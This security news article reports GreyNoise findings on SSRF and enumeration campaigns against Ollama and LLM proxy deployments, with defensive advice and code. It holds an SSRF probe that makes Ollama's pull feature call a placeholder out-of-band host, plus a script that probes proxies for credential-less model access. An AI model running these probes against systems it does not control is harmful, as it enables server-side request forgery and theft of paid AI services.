Attackers have moved beyond experimentation and are now systematically targeting artificial intelligence systems at scale.
Researchers observed more than 91,000 attack sessions aimed at AI infrastructure over a four-month period, revealing sustained and methodical campaigns against large language model (LLM) deployments.
“Threat actors don’t map infrastructure at this scale without plans to use that map,” said GreyNoise researchers.
Attackers Recon AI Services at Scale
The observed activity targeted AI model hosting environments and their supporting services, including Ollama deployments and proxy infrastructure used to connect applications to commercial LLM APIs.
As organizations increasingly deploy AI systems in production, these services are often exposed through APIs, webhooks, or proxy layers, creating new opportunities for attackers to probe for misconfigurations and abuse.
SSRF-Based Exploitation Campaign
The first campaign focused on server-side request forgery (SSRF) techniques.
Attackers abused Ollama’s model pull feature and Twilio webhook parameters to trigger outbound connections to attacker-controlled infrastructure.
Attackers confirmed successful exploitation using ProjectDiscovery’s OAST callbacks to detect outbound requests from target systems.
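For context, the sketch below shows roughly what such a probe looks like when reproduced against one's own Ollama deployment during authorized testing. The hostnames, the OAST callback domain, and the exact shape of the model reference are illustrative assumptions rather than details published by GreyNoise, and the request body assumes Ollama's pull API accepts a registry-qualified model reference in the form shown.

```python
# Illustrative sketch only: reproducing the SSRF pattern against your OWN
# Ollama deployment during authorized testing. All hostnames are placeholders.
import requests

OLLAMA_URL = "http://ollama.internal.example:11434"  # your exposed instance
OAST_HOST = "abc123.oast.example"  # an interactsh-style listener you control

# Ollama's pull feature fetches model layers from the registry named in the
# model reference. Pointing that reference at a host you monitor turns any
# outbound fetch into an out-of-band (OAST) confirmation of SSRF exposure.
resp = requests.post(
    f"{OLLAMA_URL}/api/pull",
    json={"name": f"{OAST_HOST}/library/ssrf-canary:latest"},
    timeout=15,
)
print("HTTP", resp.status_code)
# Confirmation happens out-of-band: check the OAST listener for a DNS or HTTP
# hit from the Ollama server rather than relying on this response body.
```

If outbound access from the AI host is restricted to approved registries, the callback never fires, which is precisely the egress control recommended later in this article.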
This activity persisted from October 2025 through January 2026, with a notable spike during the Christmas period — 1,688 attack sessions within 48 hours.
The timing suggests an effort to take advantage of periods when monitoring and response coverage may be reduced.
Traffic analysis also showed a highly consistent JA4H HTTP client fingerprint appearing in 99% of sessions, pointing to centralized automation, likely built on the Nuclei scanning framework.
Although requests originated from 62 IP addresses across 27 countries, the uniform fingerprints indicate the use of VPS-hosted infrastructure rather than a distributed botnet.
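For defenders, the practical takeaway is that a single automation framework tends to leave a uniform client fingerprint even when source IPs rotate. The sketch below assumes request logs have already been enriched with a JA4H hash; the file name and column names are illustrative, not a standard format.

```python
# Minimal sketch: flag JA4H fingerprints that dominate traffic across many
# source IPs, a pattern consistent with centralized VPS-hosted automation.
# Assumes a CSV export of enriched web logs with "ja4h" and "src_ip" columns.
import csv
from collections import defaultdict

sessions_by_fp = defaultdict(int)
ips_by_fp = defaultdict(set)

with open("ai_endpoint_requests.csv", newline="") as f:
    for row in csv.DictReader(f):
        fp = row["ja4h"]
        sessions_by_fp[fp] += 1
        ips_by_fp[fp].add(row["src_ip"])

total = sum(sessions_by_fp.values())
for fp, count in sorted(sessions_by_fp.items(), key=lambda kv: kv[1], reverse=True):
    share = count / total
    # Thresholds are arbitrary examples: one fingerprint carrying most traffic
    # from many distinct IPs is worth a closer look.
    if share > 0.5 and len(ips_by_fp[fp]) > 10:
        print(f"{fp}: {share:.0%} of sessions from {len(ips_by_fp[fp])} source IPs")
```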
GreyNoise assessed this campaign as potentially grey-hat activity associated with bug bounty research, but noted that the scale, persistence, and lack of coordination with affected organizations raise ethical and operational concerns.
Large-Scale AI Model Enumeration
A second, larger campaign began on Dec. 28, 2025, and emphasized systematic enumeration rather than immediate exploitation.
Over an eleven-day period, just two IP addresses generated 80,469 sessions, methodically probing more than 70 LLM endpoints.
The apparent objective was to identify misconfigured proxy servers that could allow unauthorized access to commercial AI services.
To avoid detection, attackers used deliberately low-risk queries such as “hi” and “How many states are there in the United States?” — phrases used to confirm model behavior without triggering abuse detection or content filters.
Testing spanned nearly every major model family, including OpenAI GPT-4o, Anthropic Claude, Meta Llama 3.x, Google Gemini, Mistral, Alibaba Qwen, DeepSeek-R1, and xAI Grok, highlighting a broad and methodical approach to mapping the AI ecosystem.
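In practice, this kind of enumeration looks like ordinary chat-completion traffic. The sketch below approximates the pattern against an OpenAI-compatible proxy; the proxy URL and model names are placeholders, and the request shape follows the widely used /v1/chat/completions convention rather than anything specific to this campaign. It is equally useful for testing whether your own proxy forwards requests without credentials.

```python
# Illustrative enumeration pattern: cycle candidate model names through an
# OpenAI-compatible proxy with a deliberately benign prompt, recording which
# models answer. Endpoint and model names are placeholders.
import requests

PROXY_URL = "https://llm-proxy.example.com/v1/chat/completions"
CANDIDATE_MODELS = ["gpt-4o", "claude-3-5-sonnet", "llama-3.1-70b", "gemini-1.5-pro"]

reachable = []
for model in CANDIDATE_MODELS:
    # No credentials are supplied: the point of the probe is to find proxies
    # that forward requests to commercial APIs without requiring any.
    resp = requests.post(
        PROXY_URL,
        json={
            "model": model,
            "messages": [{"role": "user", "content": "hi"}],
            "max_tokens": 5,
        },
        timeout=10,
    )
    if resp.ok:
        reachable.append(model)

print("Models answering through this proxy:", reachable)
```

Capping max_tokens keeps each probe cheap and unremarkable, consistent with the low-risk queries described above.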
Together, these campaigns show a move toward systematic reconnaissance of AI infrastructure, reinforcing the need to secure AI services like traditional applications and APIs.
Reducing Risk in AI Deployments
Organizations running AI infrastructure should take proactive steps to reduce exposure to reconnaissance and exploitation activity, including the following:
- Restrict outbound network access so AI servers can connect only to explicitly approved destinations and prevent SSRF callback abuse.
- Block known malicious indicators, including OAST-related domains, identified IP addresses, and suspicious JA4H fingerprints.
- Enforce strong authentication, authorization, and least-privilege access controls across AI endpoints, proxies, and supporting services.
- Apply rate limiting, request quotas, and behavioral throttling to disrupt automated enumeration and fingerprinting activity (a minimal sketch follows this list).
- Monitor AI infrastructure logs and telemetry for anomalous query patterns, cross-model probing, and suspicious outbound connections.
- Review and test incident response plans and detection coverage to ensure readiness for AI-specific exploitation and reconnaissance campaigns.
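As a simple illustration of the rate-limiting recommendation above, the following sketch applies a per-client sliding window in front of an AI endpoint or proxy. The window length and request budget are arbitrary example values to be tuned against real traffic, not prescriptions.

```python
# Minimal per-client sliding-window rate limiter for an AI endpoint or proxy.
# Window length and request budget are illustrative values only.
import time
from collections import defaultdict, deque

WINDOW_SECONDS = 60
MAX_REQUESTS_PER_WINDOW = 30

_request_times = defaultdict(deque)  # client_id -> timestamps of recent requests

def allow_request(client_id: str, now: float | None = None) -> bool:
    """Return True if the client is under its budget for the current window."""
    now = time.monotonic() if now is None else now
    window = _request_times[client_id]
    # Drop timestamps that have aged out of the window.
    while window and now - window[0] > WINDOW_SECONDS:
        window.popleft()
    if len(window) >= MAX_REQUESTS_PER_WINDOW:
        return False  # throttle: automated enumeration hits this budget quickly
    window.append(now)
    return True

# Example: the 31st request inside one minute is rejected.
if __name__ == "__main__":
    decisions = [allow_request("203.0.113.7", now=float(i)) for i in range(31)]
    print(decisions.count(True), "allowed,", decisions.count(False), "throttled")
```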
While no single control is sufficient on its own, a combination of network restrictions, access controls, and monitoring can limit the blast radius.
AI Systems Are Now High-Value Targets
These campaigns reflect a broader shift in attacker focus, with AI infrastructure increasingly treated as a high-value target rather than an experimental technology.
The volume and consistency of the activity — tens of thousands of requests spanning dozens of models — suggest deliberate and well-resourced efforts rather than opportunistic scanning.
Mapping AI environments at this level requires time and coordination, and it is typically a precursor to identifying weaknesses that can be exploited later.
With AI services increasingly embedded in production workflows, they are attracting the same level of attention historically reserved for critical application and cloud infrastructure.
As a result, many organizations are looking to zero-trust approaches to reduce implicit access and limit the impact of compromise across AI environments.
